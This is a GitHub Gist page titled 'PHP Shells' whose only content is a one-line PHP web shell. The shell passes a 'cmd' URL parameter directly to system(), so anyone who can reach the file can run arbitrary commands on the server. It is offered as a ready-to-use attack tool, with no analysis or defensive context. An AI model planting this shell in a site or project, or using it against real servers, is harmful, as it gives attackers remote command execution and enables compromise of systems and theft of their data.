Skip to content

Instantly share code, notes, and snippets.

@swarupsro
Last active March 19, 2023 04:30
Show Gist options
  • Save swarupsro/6359c331bcace0a7b2f84663c9475ed0 to your computer and use it in GitHub Desktop.
Save swarupsro/6359c331bcace0a7b2f84663c9475ed0 to your computer and use it in GitHub Desktop.
PHP Shells
<?php system($_GET['cmd']); ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment